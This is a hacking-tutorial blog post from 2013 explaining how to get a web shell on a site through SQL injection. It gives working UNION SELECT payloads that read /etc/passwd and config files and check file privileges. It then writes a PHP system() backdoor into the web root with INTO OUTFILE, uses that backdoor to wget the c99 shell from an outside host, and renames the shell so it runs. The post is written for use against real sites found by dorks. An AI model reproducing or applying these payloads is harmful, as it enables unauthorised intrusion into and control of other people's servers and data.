Wednesday, 24 July 2013

HOW TO UPLOAD SHELL DIRECTLY THROUGH SQL INJECTION

direct shell uploading with SQL injection queries
  
First of all find a website which is vulnerable to sql injection. You can find websites by dorks or manually like i have found this.
You need 2 main things:
  1. Root Path of the website 
  2. A Writable Directory
Most of the time, you will see root path in SQL error of that site.Like the following one.

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/aeiti/public_html/admin/requires/functions.php on line 1327
 Well If the vulnerable website doesn't show the root path then don't worry i will show you how to know the root path. And Also Writable Directory.
www.site.com/index.php?id=10'
I am not starting with abc of SQLI I hope u know the basics.
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--
Let's Try To Load Files Of The Website
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--
We Won't Need To Read Any Files Mentioned above just to increase your knowledge. Now we have to check the file privileges for the current user for this first you have to find current username.
Like This
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--
Our Current Username is etc mine is Ch3rn0by1
Now Check File Privilages for User Ch3rn0by1
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--
If it shows Y (yes) on the vulnerable column of the website that means we have the file privileges for the current user Ch3rn0by1
And if it doesn't show Y then Don't waste your time there :D

Ok Now we need to know the root path for this webserver. So, for this information we need to know the webserver type.For this you can use firefox adon server spy.
Server Spy Adon: https://addons.mozilla.org/en-us/firefox/addon/server-spy/
You can use havij and some other tool too to detect webserver type.
To know the webserver by file /etc/passwd use this query
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('/etc/passwd'),5--
now we have our webserver etc (/home/Ch3rn0by1)
now read one more file.
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--
Where Ch3rn0by1 is your webserver software name like server name.conf .

now we have the root path
/home/site.com/public_html etc.
Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D
site www.site.com/dir/*/*/*/*/
so its site.com/ch3rn0by1/writeable

now we will upload our evil code
www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
ok now we have to execute our commands
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a
Now we will use wget command to upload our evil script
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt
Now we will rename our c99.txt to php in order to execute it :D
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php
now open it
www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D

Note: In our experience, Windows servers are easy to shell with SQL queries.See our tutorial on how to directly shell a website with SQLMAP.

Author: Chernobyl From Pak Mad Hunters